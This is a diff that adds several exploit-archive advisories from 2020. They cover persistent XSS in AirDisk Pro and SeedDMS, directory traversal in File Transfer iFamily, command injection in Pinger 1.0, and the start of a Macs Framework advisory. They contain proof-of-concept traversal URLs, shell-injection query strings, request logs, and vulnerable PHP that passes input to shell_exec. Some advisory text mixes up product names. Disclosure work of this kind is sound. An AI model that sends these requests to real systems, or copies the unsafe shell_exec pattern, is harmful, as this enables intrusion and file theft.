diff --git a/exploits/ios/webapps/48321.txt b/exploits/ios/webapps/48321.txt
new file mode 100644
index 000000000..833bae26a
--- /dev/null
+++ b/exploits/ios/webapps/48321.txt
@@ -0,0 +1,417 @@
+# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: http://www.app2pro.com
+# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421
+# CVE: N/A
+
+Document Title:
+===============
+AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2203
+
+
+Release Date:
+=============
+2020-04-15
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2203
+
+
+Common Vulnerability Scoring System:
+====================================
+4.5
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+File sharing with other iOS devices via Bluetooth or Wi-Fi connection
+with automatic search of nearest devices.
+Users can perform file operations on the application like: Copy, Move,
+Zip, Unzip, Rename, Delete, Email, and more.
+Easy to create file like: Text File, New folder, Playlist, Take
+Photo/Video, Import From Library, and Voice Record.
+AirDisk Pro allows you to store, view and manage files on your iPhone,
+iPad or iPod touch. You can connect to AirDisk
+Pro from any Mac or PC over the Wi-Fi network and transfer files by drag
+& drop files straight from the Finder or Windows
+Explorer. AirDisk Pro features document viewer, PDF reader, music
+player, image viewer, voice recorder, text editor, file
+manager and support most of the file operations: like delete, move,
+copy, email, share, zip, unzip and more.
+
+(Copy of the Homepage:
+https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 )
+(Copy of the Homepage: http://www.app2pro.com )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile
+application.
+
+
+Affected Product(s):
+====================
+Felix Yew
+Product: AirDisk Pro v5.5.3 (iOS)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-15: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+No authentication (guest)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent cross site scripting vulnerability has been
+discovered in the official SuperBackup v2.0.5 ios mobile application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise the mobile
+web-application from the application-side.
+
+The first vulnerability is located in the `createFolder` parameter of
+the `Create Folder` function. Attackers are able to name
+or rename paths via airdisk pro ui to malicious persistent script codes.
+Thus allows to execute the persistent injected script
+code on the front site of the path index listing in the content itself
+on each refresh. The request method to inject is POST
+and the attack vector is located on the application-side. Interaction to
+exploit is as well possible through the unauthenticated
+started ftp service on the local network.
+
+The second vulnerability is located in the `deleteFile` parameter of the
+`Delete` function. The output location with the popup
+that asks for permission to delete, allows to execute the script code.
+The injection point is the file parameter and the execution
+point occurs in the visible delete popup with the permission question.
+The request method to inject is POST and the attack vector
+is located on the application-side.
+
+The third web vulnerability is located in the `devicename` parameter
+that is displayed on the top next to the airdisk pro ui logo.
+Remote attackers are able to inject own malicious persistent script code
+by manipulation of the local apple devicename information.
+The injection point is the devicename information and the execution
+point occurs in the file sharing ui panel of the airdisk pro
+mobile web-application.
+
+Remote attackers are able to inject own script codes to the client-side
+requested vulnerable web-application parameters. The attack
+vector of the vulnerability is persistent and the request method to
+inject/execute is POST. The vulnerabilities are classic client-side
+cross site scripting vulnerabilities. Successful exploitation of the
+vulnerability results in session hijacking, persistent phishing
+attacks, persistent external redirects to malicious source and
+persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] AirDisk pro Wifi UI
+
+Vulnerable Parameter(s):
+[+] createFolder
+[+] deleteFile
+[+] devicename
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with wifi access with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+1. Create Folder
+
+PoC: Vulnerable Source
+
+
+test 11 Apr 2020 at 12:35 Folder
+
+
+
+
+test>"
+
+
+PoC: Vulnerable Source (Listing - Index)
+
+
+
+Contacts 09:17:12:PM 10:Apr.:2020 .vcf
+26.40 KB
+
+
+
+
+
+
+
+
+
+PoC: Exception-Handling
+Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
+.vcf"
+to "/Contacts >"
+09:17:12:PM 10:Apr.:2020 .vcf"
+-
+Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
+.vcf"
+to "/Contacts 09:17:12:PM 10:Apr.:2020 >" .vcf"
+-
+Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
+.vcf"
+to "/Contacts >"09:17:12:PM 10:Apr.:2020 .vcf"
+
+
+PoC: Exploit
+BEGIN:VCARD
+VERSION:3.0
+PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
+B:Kunz Mejri ;>" ;;;
+END:VCARD
+
+
+--- PoC Session Logs [POST] ---
+http://localhost/move
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 187
+Origin: http://localhost
+Connection: keep-alive
+Referer: http://localhost/
+oldPath=/Contacts 09:17:12:PM 10:Apr.:2020
+.vcf&newPath=/evil-filename>".vc
+-
+POST: HTTP/1.1 500 Internal Server Error
+Content-Length: 593
+Content-Type: text/html; charset=utf-8
+Connection: Close
+Server: GCDWebUploader
+-
+http://localhost/evil.source
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer: http://localhost/
+-
+GET: HTTP/1.1 200 OK
+Server: GCDWebUploader
+Connection: Close
+
+
+Solution - Fix & Patch:
+=======================
+1. Parse and filter the vcf name values next to add, edit or imports to
+prevent an execution
+2. Restrict and filter in the index listing the vcf names to sanitize
+the output
+
+
+Security Risk:
+==============
+The security risk of the persistent vcf cross site scripting web
+vulnerability is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/ios/webapps/48327.txt b/exploits/ios/webapps/48327.txt
new file mode 100644
index 000000000..6063109bf
--- /dev/null
+++ b/exploits/ios/webapps/48327.txt
@@ -0,0 +1,245 @@
+# Title: File Transfer iFamily 2.1 - Directory Traversal
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Software Link: http://www.dedecms.com/products/dedecms/downloads/
+# CVE: N/A
+
+Document Title:
+===============
+File Transfer iFamily v2.1 - Directory Traversal Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2199
+
+
+Release Date:
+=============
+2020-04-14
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2199
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Vulnerability Class:
+====================
+Directory- or Path-Traversal
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Send photos, videos and documents to other devices without Internet. A
+complete application to exchange files
+wirelessly between devices. It uses the Multipeer Connectivity Framework
+to search and connect to available devices,
+without the need of internet connection or any kind of server and database.
+
+(Copy of the Homepage:
+https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575
+)
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a directory
+traversal web vulnerability in the official File Transfer iFamily v2.1
+ios mobile application.
+
+
+Affected Product(s):
+====================
+DONG JOO CHO
+Product: File Transfer iFamily v2.1 - iOS Mobile Web Application
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-14: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre auth - no privileges
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A directory traversal web vulnerability has been discovered in the
+official File Transfer iFamily v2.1 ios mobile application.
+The vulnerability allows remote attackers to change the application path
+in performed requests to compromise the local application
+or file-system of a mobile device. Attackers are for example able to
+request environment variables or a sensitive system path.
+
+The directory-traversal web vulnerability is located in the main
+application path request performed via GET method. Attackers are
+able to request for example the local ./etc/ path of the web-server by
+changing the local path in the performed request itself.
+In a first request the attack changes the path, the host redirects to
+complete the adress with "..". Then the attacker just
+attaches a final slash to its request and the path can be accessed via
+web-browser to download local files.
+
+Exploitation of the directory traversal web vulnerability requires no
+privileged web-application user account or user interaction.
+Successful exploitation of the vulnerability results in information
+leaking by unauthorized file access and mobile application compromise.
+
+
+Proof of Concept (PoC):
+=======================
+The directory traversal vulnerability can be exploited by attackers with
+access to the wifi interface in a local network without user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information and steps below to continue.
+
+
+PoC: Exploitation
+http://localhost/../../../../../../../../../../../../../../../../../../../../../../
+http://localhost//../
+
+
+--- PoC Session Logs [GET]] ---
+http://localhost/../../../../../../../../../../../../../../../../../../../../../../
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Content-Length: 2521
+-
+http://localhost../etc/
+Host: localhost..
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+- add slash to correct host adress (/.././)
+http://localhost/./
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+- Access granted
+http://localhost/../../../../../../../../../../../../../../../../../../../../../../
+GET: HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Content-Length: 2521
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a restriction of the visible and
+accessable ./etc/ path in the app container.
+Disallow path changes in the client-side get method requests and
+validate them securely.
+
+
+Security Risk:
+==============
+The security risk of the directory travsersal web vulnerability in the
+ios mobile application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
\ No newline at end of file
diff --git a/exploits/php/webapps/48323.txt b/exploits/php/webapps/48323.txt
new file mode 100644
index 000000000..e6038c894
--- /dev/null
+++ b/exploits/php/webapps/48323.txt
@@ -0,0 +1,75 @@
+# Title: Pinger 1.0 - Remote Code Execution
+# Date: 2020-04-13
+# Author: Milad Karimi
+# Vendor Homepage: https://github.com/wcchandler/pinger
+# Software Link: https://github.com/wcchandler/pinger
+# Tested on: windows 10 , firefox
+# Version: 1.0
+# CVE : N/A
+
+================================================================================
+Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
+================================================================================
+# Vendor Homepage: https://github.com/wcchandler/pinger
+# Software Link: https://github.com/wcchandler/pinger
+# Date: 2020.04.13
+# Author: Milad Karimi
+# Tested on: windows 10 , firefox
+# Version: 1.0
+# CVE : N/A
+================================================================================
+# Description:
+simple, easy to use jQuery frontend to php backend that pings various
+devices and changes colors from green to red depending on if device is
+up or down.
+
+# PoC :
+
+http://localhost/pinger/ping.php?ping=;echo '' >info.php
+http://localhost/pinger/ping.php?socket=;echo '' >info.php
+
+
+# Vulnerabile code:
+
+ if(isset($_GET['ping'])){
+ // if this is ever noticably slower, i'll pass it stuff when called
+ // change the good.xml to config.xml, good is what I use at $WORK
+ $xml = simplexml_load_file("config.xml");
+ //$xml = simplexml_load_file("good.xml");
+ if($_GET['ping'] == ""){
+ $host = "127.0.0.1";
+ }else{
+ $host = $_GET['ping'];
+ }
+ $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout
+ .' '.$host.' | grep received | awk \'{print $4}\''));
+ $id = str_replace('.','_',$host);
+
+ if(($out == "1") || ($out == "0")){
+ echo json_encode(array("id"=>"h$id","res"=>"$out"));
+ }else{
+ ## if it returns nothing, assume network is messed up
+ echo json_encode(array("id"=>"h$id","res"=>"0"));
+ }
+ }
+
+ if(isset($_GET['socket'])){
+ $xml = simplexml_load_file("config.xml");
+ //$xml = simplexml_load_file("good.xml");
+ if($_GET['socket'] == ""){
+ $host = "127.0.0.1 80";
+ }else{
+ $host = str_replace(':',' ',$_GET['socket']);
+ }
+ $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');
+ $id = str_replace('.','_',$host);
+ $id = str_replace(' ','_',$id);
+ if(preg_match("/succeeded/",$out)){
+ echo json_encode(array("id"=>"h$id","res"=>"1"));
+ }else{
+ ## if it returns nothing, assume network is messed up
+ echo json_encode(array("id"=>"h$id","res"=>"0"));
+ }
+ }
+
+ ?>
\ No newline at end of file
diff --git a/exploits/php/webapps/48324.txt b/exploits/php/webapps/48324.txt
new file mode 100644
index 000000000..b44c3167f
--- /dev/null
+++ b/exploits/php/webapps/48324.txt
@@ -0,0 +1,352 @@
+# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: https://www.seeddms.org
+# Software Link: https://www.seeddms.org/index.php?id=7
+# CVE: N/A
+
+Document Title:
+===============
+SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2209
+
+
+Release Date:
+=============
+2020-04-15
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2209
+
+
+Common Vulnerability Scoring System:
+====================================
+4.3
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+SeedDMS is a free document management system with an easy to use web
+based user interface. It is based on PHP and
+MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of
+development has made it a mature, powerful
+and enterprise ready platform for sharing and storing documents. It's
+fully compatible with its predecessor LetoDMS.
+
+(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 &
+https://www.seeddms.org/index.php?id=7 )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.
+
+
+Affected Product(s):
+====================
+Uwe Steinmann
+Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14,
+v5.1.16, v5.1.18 and v6.0.7
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-15: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent cross site web vulnerabilities has been discovered
+in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent cross site scripting web vulnerabilities are located in
+the `name` and `comment` parameter of the `AddEvent.php` file.
+Remote attackers are able to add an own event via op.AddEvent with
+malicious script codes. The request method to inject is POST
+and the attack vector is located on the application-side. After the
+inject the execution occurs in the admin panel within the
+`Log Management` - `Webdav` and `Web` on view. The content of the
+comment and name is unescaped pushed inside of the logs with
+a html/js template. Thus allows an attacker to remotly exploit the issue
+by a simple post inject from outside with lower privileges.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected or connected
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] op.AddEvent (AddEvent.php)
+
+Vulnerable Parameter(s):
+[+] name
+[+] comment
+
+Affected Module(s):
+[+] Log Management (out.LogManagement.php)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by remote attackers
+with low privileged web-application user account and low user interaction.
+For security demonstration or to reproduce the security web
+vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Start your local webbrowser and tamper the http protocol session
+2. Open the AddEvent.php and add a new event
+3. Insert your script code test payload inside the Name or Comments path
+4. Save or submit the entry with error
+Note: Now the web and webdav log has captured the insert or erro
+5. Now wait until the administrator previews in the log management the
+web or webdav view function
+6. Successful reproduce of the persistent web vulnerability!
+
+
+PoC: Vulnerable Source (Log Management - View)
+Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog
+?logname=20200413.log
+Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="
+&comment=&from=1586728800&to=1586815199
+
+
+
+PoC: Payload
+>"
+
+
+--- PoC Session Logs (POST) ---
+https://SeedDMS.localhost:8080/out/out.AddEvent.php
+Host: SeedDMS.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y
+Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.25 (Debian)
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 2973
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+-
+https://SeedDMS.localhost:8080/op/op.AddEvent.php
+Host: SeedDMS.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 356
+Origin: https://SeedDMS.localhost:8080
+Connection: keep-alive
+Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php
+Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
+from=2020-04-13&to=2020-04-13
+&name=>"&comment=>"
+-
+POST: HTTP/1.1 302 Found
+Server: Apache/2.4.25 (Debian)
+Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+Note: Injection Point via Calender op.AddEvent Name & Comment
+
+
+
+--- PoC Session Logs (GET) ---
+https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log
+Host: SeedDMS.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: text/html, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
+Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.25 (Debian)
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 273
+Keep-Alive: timeout=5, max=94
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+-
+https://SeedDMS.localhost:8080/out/evil.source
+Host: SeedDMS.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
+Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 302 Found
+Server: Apache/2.4.25 (Debian)
+Location: /out/out.ViewFolder.php
+Content-Length: 0
+Keep-Alive: timeout=5, max=93
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+Note: Execution Point via Log Management (AP) on Webdav View or Web View
+
+
+
+Reference(s):
+https://SeedDMS.localhost:8080/
+https://SeedDMS.localhost:8080/op/op.AddEvent.php
+https://SeedDMS.localhost:8080/out/out.ViewFolder.php
+https://SeedDMS.localhost:8080/out/out.AddEvent.php
+https://SeedDMS.localhost:8080/out/out.LogManagement.php
+https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=
+https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=
+
+
+Solution - Fix & Patch:
+=======================
+1. Parse and escape the name and comment input field on transmit to sanitize
+2. Filter and restrict the input field of the name and comments
+parameter for special chars to prevent injects
+3. Parse the output location of all web and webdav logfiles to prevent
+the execution point
+
+
+Security Risk:
+==============
+The security risk of the persistent cross site web vulnerabilities in
+the seeddms web-application are estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48325.txt b/exploits/php/webapps/48325.txt
new file mode 100644
index 000000000..0cb46c90a
--- /dev/null
+++ b/exploits/php/webapps/48325.txt
@@ -0,0 +1,482 @@
+# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
+# CVE: N/A
+
+Document Title:
+===============
+Macs Framework v1.14f CMS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2206
+
+
+Release Date:
+=============
+2020-04-14
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2206
+
+
+Common Vulnerability Scoring System:
+====================================
+7.4
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management
+System. It focuses mainly on the
+Edit In Place editing concept. It comes with a built in blog with
+moderation support, user manager section,
+roles manager section, SEO / SEF URL.
+https://sourceforge.net/projects/macs-framework/files/latest/download
+
+(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple web
+vulnerabilities in the official Macs Framework v1.1.4f CMS.
+
+
+Affected Product(s):
+====================
+Macrob7
+Product: Macs Framework v1.14f - Content Management System
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-14: Public Disclosure (Vulnerability Laboratory)
+
+
